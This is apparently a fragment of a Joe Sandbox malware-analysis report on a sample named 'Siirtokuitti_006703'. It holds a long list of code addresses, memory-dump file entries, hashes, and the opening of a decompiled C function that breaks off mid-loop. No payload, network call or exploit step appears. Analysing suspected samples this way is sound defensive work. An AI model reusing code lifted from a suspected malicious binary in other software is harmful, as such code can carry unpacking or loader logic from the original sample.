                                                                                                                      0x004069e3
                                                                                                                      0x004069b9
                                                                                                                      0x004069bd
                                                                                                                      0x004069c2
                                                                                                                      0x004069c2
                                                                                                                      0x004069cb
                                                                                                                      0x004069d3
                                                                                                                      0x004069d6
                                                                                                                      0x00000000
                                                                                                                      0x004069dc
                                                                                                                      0x004069dc
                                                                                                                      0x00000000
                                                                                                                      0x004069dc
                                                                                                                      0x00000000
                                                                                                                      0x004069f9
                                                                                                                      0x004069f9
                                                                                                                      0x004069fd
                                                                                                                      0x004072a9
                                                                                                                      0x004072a9
                                                                                                                      0x00000000
                                                                                                                      0x004072a9
                                                                                                                      0x00406a03
                                                                                                                      0x00406a06
                                                                                                                      0x00406a16
                                                                                                                      0x00406a19
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1f
                                                                                                                      0x00406a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a25
                                                                                                                      0x00406a25
                                                                                                                      0x00406a2b
                                                                                                                      0x00406a55
                                                                                                                      0x00406a5b
                                                                                                                      0x00406a62
                                                                                                                      0x00000000
                                                                                                                      0x00406a62
                                                                                                                      0x00406a2d
                                                                                                                      0x00406a31
                                                                                                                      0x00406a34
                                                                                                                      0x00406a39
                                                                                                                      0x00406a39
                                                                                                                      0x00406a44
                                                                                                                      0x00406a4c
                                                                                                                      0x00406a4f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a94
                                                                                                                      0x00406a9a
                                                                                                                      0x00406a9d
                                                                                                                      0x00406aaa
                                                                                                                      0x00406ab2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a69
                                                                                                                      0x00406a69
                                                                                                                      0x00406a6d
                                                                                                                      0x004072b8
                                                                                                                      0x004072b8
                                                                                                                      0x00000000
                                                                                                                      0x004072b8
                                                                                                                      0x00406a73
                                                                                                                      0x00406a79
                                                                                                                      0x00406a84
                                                                                                                      0x00406a84
                                                                                                                      0x00406a84
                                                                                                                      0x00406a87
                                                                                                                      0x00406a8a
                                                                                                                      0x00406a8d
                                                                                                                      0x00406a92
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00407129
                                                                                                                      0x00407129
                                                                                                                      0x0040712f
                                                                                                                      0x00407135
                                                                                                                      0x0040713b
                                                                                                                      0x00407155
                                                                                                                      0x00407158
                                                                                                                      0x0040715e
                                                                                                                      0x00407169
                                                                                                                      0x00407169
                                                                                                                      0x0040716b
                                                                                                                      0x0040713d
                                                                                                                      0x0040713d
                                                                                                                      0x0040714c
                                                                                                                      0x00407150
                                                                                                                      0x00407150
                                                                                                                      0x00407175
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00407177
                                                                                                                      0x0040717b
                                                                                                                      0x0040732a
                                                                                                                      0x0040732a
                                                                                                                      0x00000000
                                                                                                                      0x0040732a
                                                                                                                      0x00407181
                                                                                                                      0x00407187
                                                                                                                      0x0040718e
                                                                                                                      0x00407196
                                                                                                                      0x00407199
                                                                                                                      0x0040719c
                                                                                                                      0x0040719c
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406aba
                                                                                                                      0x00406aba
                                                                                                                      0x00406abc
                                                                                                                      0x00406abf
                                                                                                                      0x00406b30
                                                                                                                      0x00406b30
                                                                                                                      0x00406b33
                                                                                                                      0x00406b36
                                                                                                                      0x00406b3d
                                                                                                                      0x00406b47
                                                                                                                      0x00000000
                                                                                                                      0x00406b47
                                                                                                                      0x00406ac1
                                                                                                                      0x00406ac1
                                                                                                                      0x00406ac5
                                                                                                                      0x00406ac8
                                                                                                                      0x00406aca
                                                                                                                      0x00406acd
                                                                                                                      0x00406ad0
                                                                                                                      0x00406ad2
                                                                                                                      0x00406ad5
                                                                                                                      0x00406ad7
                                                                                                                      0x00406adc
                                                                                                                      0x00406adf
                                                                                                                      0x00406ae2
                                                                                                                      0x00406ae6
                                                                                                                      0x00406aed
                                                                                                                      0x00406af0
                                                                                                                      0x00406af7
                                                                                                                      0x00406afb
                                                                                                                      0x00406b03
                                                                                                                      0x00406b03
                                                                                                                      0x00406b03
                                                                                                                      0x00406afd
                                                                                                                      0x00406afd
                                                                                                                      0x00406afd
                                                                                                                      0x00406af2
                                                                                                                      0x00406af2
                                                                                                                      0x00406af2
                                                                                                                      0x00406b07
                                                                                                                      0x00406b0a
                                                                                                                      0x00406b28
                                                                                                                      0x00406b28
                                                                                                                      0x00406b2a
                                                                                                                      0x00000000
                                                                                                                      0x00406b0c
                                                                                                                      0x00406b0c
                                                                                                                      0x00406b0c
                                                                                                                      0x00406b0f
                                                                                                                      0x00406b12
                                                                                                                      0x00406b15
                                                                                                                      0x00406b17
                                                                                                                      0x00406b17
                                                                                                                      0x00406b17
                                                                                                                      0x00406b1a
                                                                                                                      0x00406b1d
                                                                                                                      0x00406b1f
                                                                                                                      0x00406b20
                                                                                                                      0x00406b23
                                                                                                                      0x00000000
                                                                                                                      0x00406b23
                                                                                                                      0x00000000
                                                                                                                      0x00406d59
                                                                                                                      0x00406d59
                                                                                                                      0x00406d5d
                                                                                                                      0x00406d7b
                                                                                                                      0x00406d7b
                                                                                                                      0x00406d7e
                                                                                                                      0x00406d85
                                                                                                                      0x00406d88
                                                                                                                      0x00406d8b
                                                                                                                      0x00406d8e
                                                                                                                      0x00406d91
                                                                                                                      0x00406d94
                                                                                                                      0x00406d96
                                                                                                                      0x00406d9d
                                                                                                                      0x00406d9e
                                                                                                                      0x00406da0
                                                                                                                      0x00406da3
                                                                                                                      0x00406da6
                                                                                                                      0x00406da9
                                                                                                                      0x00406da9
                                                                                                                      0x00406dae
                                                                                                                      0x00000000
                                                                                                                      0x00406dae
                                                                                                                      0x00406d5f
                                                                                                                      0x00406d5f
                                                                                                                      0x00406d62
                                                                                                                      0x00406d65
                                                                                                                      0x00406d6f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406dc3
                                                                                                                      0x00406dc3
                                                                                                                      0x00406dc7
                                                                                                                      0x00406dea
                                                                                                                      0x00406ded
                                                                                                                      0x00406df0
                                                                                                                      0x00406dfa
                                                                                                                      0x00406dc9
                                                                                                                      0x00406dc9
                                                                                                                      0x00406dcc
                                                                                                                      0x00406dcf
                                                                                                                      0x00406dd2
                                                                                                                      0x00406ddf
                                                                                                                      0x00406de2
                                                                                                                      0x00406de2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e06
                                                                                                                      0x00406e06
                                                                                                                      0x00406e0a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e10
                                                                                                                      0x00406e10
                                                                                                                      0x00406e14
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e1a
                                                                                                                      0x00406e1a
                                                                                                                      0x00406e1c
                                                                                                                      0x00406e20
                                                                                                                      0x00406e20
                                                                                                                      0x00406e23
                                                                                                                      0x00406e27
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e77
                                                                                                                      0x00406e77
                                                                                                                      0x00406e7b
                                                                                                                      0x00406e82
                                                                                                                      0x00406e82
                                                                                                                      0x00406e85
                                                                                                                      0x00406e88
                                                                                                                      0x00406e92
                                                                                                                      0x00000000
                                                                                                                      0x00406e92
                                                                                                                      0x00406e7d
                                                                                                                      0x00406e7d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e9e
                                                                                                                      0x00406e9e
                                                                                                                      0x00406ea2
                                                                                                                      0x00406ea9
                                                                                                                      0x00406eac
                                                                                                                      0x00406eaf
                                                                                                                      0x00406ea4
                                                                                                                      0x00406ea4
                                                                                                                      0x00406ea4
                                                                                                                      0x00406eb2
                                                                                                                      0x00406eb5
                                                                                                                      0x00406eb8
                                                                                                                      0x00406eb8
                                                                                                                      0x00406ebb
                                                                                                                      0x00406ebe
                                                                                                                      0x00406ec1
                                                                                                                      0x00406ec1
                                                                                                                      0x00406ec4
                                                                                                                      0x00406ecb
                                                                                                                      0x00406ed0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406f5e
                                                                                                                      0x00406f5e
                                                                                                                      0x00406f62
                                                                                                                      0x00407300
                                                                                                                      0x00407300
                                                                                                                      0x00000000
                                                                                                                      0x00407300
                                                                                                                      0x00406f68
                                                                                                                      0x00406f68
                                                                                                                      0x00406f6b
                                                                                                                      0x00406f6e
                                                                                                                      0x00406f72
                                                                                                                      0x00406f75
                                                                                                                      0x00406f7b
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f80
                                                                                                                      0x00406f83
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b53
                                                                                                                      0x00406b53
                                                                                                                      0x00406b57
                                                                                                                      0x004072c4
                                                                                                                      0x004072c4
                                                                                                                      0x00000000
                                                                                                                      0x004072c4
                                                                                                                      0x00406b5d
                                                                                                                      0x00406b5d
                                                                                                                      0x00406b60
                                                                                                                      0x00406b63
                                                                                                                      0x00406b67
                                                                                                                      0x00406b6a
                                                                                                                      0x00406b70
                                                                                                                      0x00406b72
                                                                                                                      0x00406b72
                                                                                                                      0x00406b72
                                                                                                                      0x00406b75
                                                                                                                      0x00406b78
                                                                                                                      0x00406b78
                                                                                                                      0x00406b7b
                                                                                                                      0x00406b7e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b84
                                                                                                                      0x00406b84
                                                                                                                      0x00406b8a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b90
                                                                                                                      0x00406b90
                                                                                                                      0x00406b94
                                                                                                                      0x00406b97
                                                                                                                      0x00406b9a
                                                                                                                      0x00406b9d
                                                                                                                      0x00406ba0
                                                                                                                      0x00406ba1
                                                                                                                      0x00406ba4
                                                                                                                      0x00406ba6
                                                                                                                      0x00406bac
                                                                                                                      0x00406baf
                                                                                                                      0x00406bb2
                                                                                                                      0x00406bb5
                                                                                                                      0x00406bb8
                                                                                                                      0x00406bbb
                                                                                                                      0x00406bbe
                                                                                                                      0x00406bda
                                                                                                                      0x00406bdd
                                                                                                                      0x00406be0
                                                                                                                      0x00406be3
                                                                                                                      0x00406bea
                                                                                                                      0x00406bee
                                                                                                                      0x00406bf0
                                                                                                                      0x00406bf4
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc4
                                                                                                                      0x00406bcc
                                                                                                                      0x00406bd1
                                                                                                                      0x00406bd3
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bf7
                                                                                                                      0x00406bfe
                                                                                                                      0x00406c01
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c10
                                                                                                                      0x004072d0
                                                                                                                      0x004072d0
                                                                                                                      0x00000000
                                                                                                                      0x004072d0
                                                                                                                      0x00406c16
                                                                                                                      0x00406c16
                                                                                                                      0x00406c19
                                                                                                                      0x00406c1c
                                                                                                                      0x00406c20
                                                                                                                      0x00406c23
                                                                                                                      0x00406c29
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2e
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c37
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c39
                                                                                                                      0x00406c39
                                                                                                                      0x00406c3c
                                                                                                                      0x00406c3f
                                                                                                                      0x00406c42
                                                                                                                      0x00406c45
                                                                                                                      0x00406c48
                                                                                                                      0x00406c4b
                                                                                                                      0x00406c4e
                                                                                                                      0x00406c51
                                                                                                                      0x00406c54
                                                                                                                      0x00406c57
                                                                                                                      0x00406c6f
                                                                                                                      0x00406c72
                                                                                                                      0x00406c75
                                                                                                                      0x00406c78
                                                                                                                      0x00406c7b
                                                                                                                      0x00406c7f
                                                                                                                      0x00406c81
                                                                                                                      0x00406c59
                                                                                                                      0x00406c59
                                                                                                                      0x00406c61
                                                                                                                      0x00406c66
                                                                                                                      0x00406c68
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c84
                                                                                                                      0x00406c8b
                                                                                                                      0x00406c8e
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00406c90
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00406c8e
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd4
                                                                                                                      0x004072dc
                                                                                                                      0x004072dc
                                                                                                                      0x00000000
                                                                                                                      0x004072dc
                                                                                                                      0x00406cda
                                                                                                                      0x00406cda
                                                                                                                      0x00406cdd
                                                                                                                      0x00406ce0
                                                                                                                      0x00406ce4
                                                                                                                      0x00406ce7
                                                                                                                      0x00406ced
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cf2
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cfb
                                                                                                                      0x00406c99
                                                                                                                      0x00406c99
                                                                                                                      0x00406c9c
                                                                                                                      0x00000000
                                                                                                                      0x00406c9c
                                                                                                                      0x00406cfd
                                                                                                                      0x00406cfd
                                                                                                                      0x00406d00
                                                                                                                      0x00406d03
                                                                                                                      0x00406d06
                                                                                                                      0x00406d09
                                                                                                                      0x00406d0c
                                                                                                                      0x00406d0f
                                                                                                                      0x00406d12
                                                                                                                      0x00406d15
                                                                                                                      0x00406d18
                                                                                                                      0x00406d1b
                                                                                                                      0x00406d33
                                                                                                                      0x00406d36
                                                                                                                      0x00406d39
                                                                                                                      0x00406d3c
                                                                                                                      0x00406d3f
                                                                                                                      0x00406d43
                                                                                                                      0x00406d45
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d25
                                                                                                                      0x00406d2a
                                                                                                                      0x00406d2c
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d48
                                                                                                                      0x00406d4f
                                                                                                                      0x00406d52
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe5
                                                                                                                      0x0040730c
                                                                                                                      0x0040730c
                                                                                                                      0x00000000
                                                                                                                      0x0040730c
                                                                                                                      0x00406feb
                                                                                                                      0x00406feb
                                                                                                                      0x00406fee
                                                                                                                      0x00406ff1
                                                                                                                      0x00406ff5
                                                                                                                      0x00406ff8
                                                                                                                      0x00406ffe
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407003
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406db1
                                                                                                                      0x00406db1
                                                                                                                      0x00406db4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070f0
                                                                                                                      0x004070f0
                                                                                                                      0x004070f4
                                                                                                                      0x00407116
                                                                                                                      0x00407116
                                                                                                                      0x00407119
                                                                                                                      0x00407123
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x004070f6
                                                                                                                      0x004070f6
                                                                                                                      0x004070f9
                                                                                                                      0x004070fd
                                                                                                                      0x00407100
                                                                                                                      0x00407100
                                                                                                                      0x00407103
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071ad
                                                                                                                      0x004071ad
                                                                                                                      0x004071b1
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071d6
                                                                                                                      0x004071dd
                                                                                                                      0x004071e4
                                                                                                                      0x004071e4
                                                                                                                      0x004071eb
                                                                                                                      0x004071ee
                                                                                                                      0x004071f5
                                                                                                                      0x00000000
                                                                                                                      0x004071f8
                                                                                                                      0x004071b3
                                                                                                                      0x004071b3
                                                                                                                      0x004071b6
                                                                                                                      0x004071b9
                                                                                                                      0x004071bc
                                                                                                                      0x004071c3
                                                                                                                      0x00407107
                                                                                                                      0x00407107
                                                                                                                      0x0040710a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040729e
                                                                                                                      0x0040729e
                                                                                                                      0x004072a1
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x004071a8
                                                                                                                      0x00000000
                                                                                                                      0x00406ed8
                                                                                                                      0x00406ed8
                                                                                                                      0x00406eda
                                                                                                                      0x00406ee1
                                                                                                                      0x00406ee2
                                                                                                                      0x00406ee4
                                                                                                                      0x00406ee7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071eb
                                                                                                                      0x004071eb
                                                                                                                      0x004071ee
                                                                                                                      0x004071f5
                                                                                                                      0x00000000
                                                                                                                      0x004071f8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406f1d
                                                                                                                      0x00406f1d
                                                                                                                      0x00406f20
                                                                                                                      0x00406f56
                                                                                                                      0x00406f56
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407089
                                                                                                                      0x00407089
                                                                                                                      0x0040708c
                                                                                                                      0x0040708e
                                                                                                                      0x00407318
                                                                                                                      0x00407318
                                                                                                                      0x00000000
                                                                                                                      0x00407318
                                                                                                                      0x00407094
                                                                                                                      0x00407094
                                                                                                                      0x00407097
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040709d
                                                                                                                      0x0040709d
                                                                                                                      0x004070a1
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x00000000
                                                                                                                      0x004070a4
                                                                                                                      0x00406f22
                                                                                                                      0x00406f22
                                                                                                                      0x00406f24
                                                                                                                      0x00406f26
                                                                                                                      0x00406f28
                                                                                                                      0x00406f2b
                                                                                                                      0x00406f2c
                                                                                                                      0x00406f2e
                                                                                                                      0x00406f30
                                                                                                                      0x00406f33
                                                                                                                      0x00406f36
                                                                                                                      0x00406f4c
                                                                                                                      0x00406f4c
                                                                                                                      0x00406f51
                                                                                                                      0x00406f89
                                                                                                                      0x00406f89
                                                                                                                      0x00406f8d
                                                                                                                      0x00406fb6
                                                                                                                      0x00406fb9
                                                                                                                      0x00406fbb
                                                                                                                      0x00406fc2
                                                                                                                      0x00406fc5
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcf
                                                                                                                      0x00406fd2
                                                                                                                      0x00406fd9
                                                                                                                      0x00406fdc
                                                                                                                      0x00407009
                                                                                                                      0x00407009
                                                                                                                      0x0040700c
                                                                                                                      0x0040700f
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00000000
                                                                                                                      0x00407083
                                                                                                                      0x00407011
                                                                                                                      0x00407011
                                                                                                                      0x00407017
                                                                                                                      0x0040701a
                                                                                                                      0x0040701d
                                                                                                                      0x00407020
                                                                                                                      0x00407023
                                                                                                                      0x00407026
                                                                                                                      0x00407029
                                                                                                                      0x0040702c
                                                                                                                      0x0040702f
                                                                                                                      0x00407032
                                                                                                                      0x0040704b
                                                                                                                      0x0040704d
                                                                                                                      0x00407050
                                                                                                                      0x00407051
                                                                                                                      0x00407054
                                                                                                                      0x00407056
                                                                                                                      0x00407059
                                                                                                                      0x0040705b
                                                                                                                      0x0040705d
                                                                                                                      0x00407060
                                                                                                                      0x00407062
                                                                                                                      0x00407065
                                                                                                                      0x00407069
                                                                                                                      0x0040706b
                                                                                                                      0x0040706b
                                                                                                                      0x0040706c
                                                                                                                      0x0040706f
                                                                                                                      0x00407072
                                                                                                                      0x00407034
                                                                                                                      0x00407034
                                                                                                                      0x0040703c
                                                                                                                      0x00407041
                                                                                                                      0x00407043
                                                                                                                      0x00407046
                                                                                                                      0x00407046
                                                                                                                      0x00407075
                                                                                                                      0x0040707c
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x0040707e
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x0040707c
                                                                                                                      0x00406f8f
                                                                                                                      0x00406f8f
                                                                                                                      0x00406f92
                                                                                                                      0x00406f94
                                                                                                                      0x00406f97
                                                                                                                      0x00406f9a
                                                                                                                      0x00406f9d
                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c9f
                                                                                                                      0x00406c9f
                                                                                                                      0x00406ca3
                                                                                                                      0x004072e8
                                                                                                                      0x004072e8
                                                                                                                      0x00000000
                                                                                                                      0x004072e8
                                                                                                                      0x00406ca9
                                                                                                                      0x00406ca9
                                                                                                                      0x00406cac
                                                                                                                      0x00406caf
                                                                                                                      0x00406cb2
                                                                                                                      0x00406cb5
                                                                                                                      0x00406cb8
                                                                                                                      0x00406cbb
                                                                                                                      0x00406cbd
                                                                                                                      0x00406cc0
                                                                                                                      0x00406cc3
                                                                                                                      0x00406cc6
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2e
                                                                                                                      0x004072f4
                                                                                                                      0x004072f4
                                                                                                                      0x00000000
                                                                                                                      0x004072f4
                                                                                                                      0x00406e34
                                                                                                                      0x00406e34
                                                                                                                      0x00406e37
                                                                                                                      0x00406e3a
                                                                                                                      0x00406e3d
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e42
                                                                                                                      0x00406e45
                                                                                                                      0x00406e48
                                                                                                                      0x00406e4b
                                                                                                                      0x00406e4e
                                                                                                                      0x00406e51
                                                                                                                      0x00406e52
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e57
                                                                                                                      0x00406e5a
                                                                                                                      0x00406e5d
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e63
                                                                                                                      0x00406e65
                                                                                                                      0x00406e65
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x004070eb
                                                                                                                      0x00406e68
                                                                                                                      0x00406e68
                                                                                                                      0x00000000
                                                                                                                      0x00406e68
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x0040731e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00407355
                                                                                                                      0x00407355
                                                                                                                      0x00000000
                                                                                                                      0x00407355
                                                                                                                      0x004071a2
                                                                                                                      0x00407222
                                                                                                                      0x004071eb

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                      • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                                                                                      • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                      • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E004070F0() {
                                                                                                                      				void _t533;
                                                                                                                      				signed int _t534;
                                                                                                                      				signed int _t535;
                                                                                                                      				signed int* _t605;
                                                                                                                      				void* _t612;
                                                                                                                      
                                                                                                                      				L0:
                                                                                                                      				while(1) {
                                                                                                                      					L0:
                                                                                                                      					if( *(_t612 - 0x40) != 0) {
                                                                                                                      						 *(_t612 - 0x84) = 0x13;
                                                                                                                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                      						goto L132;
                                                                                                                      					} else {
                                                                                                                      						__eax =  *(__ebp - 0x4c);
                                                                                                                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                      						__ecx =  *(__ebp - 0x58);
                                                                                                                      						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                      						L130:
                                                                                                                      						 *(__ebp - 0x58) = __eax;
                                                                                                                      						 *(__ebp - 0x40) = 3;
                                                                                                                      						L144:
                                                                                                                      						 *(__ebp - 0x7c) = 0x14;
                                                                                                                      						L145:
                                                                                                                      						__eax =  *(__ebp - 0x40);
                                                                                                                      						 *(__ebp - 0x50) = 1;
                                                                                                                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                      						L149:
                                                                                                                      						if( *(__ebp - 0x48) <= 0) {
                                                                                                                      							__ecx =  *(__ebp - 0x40);
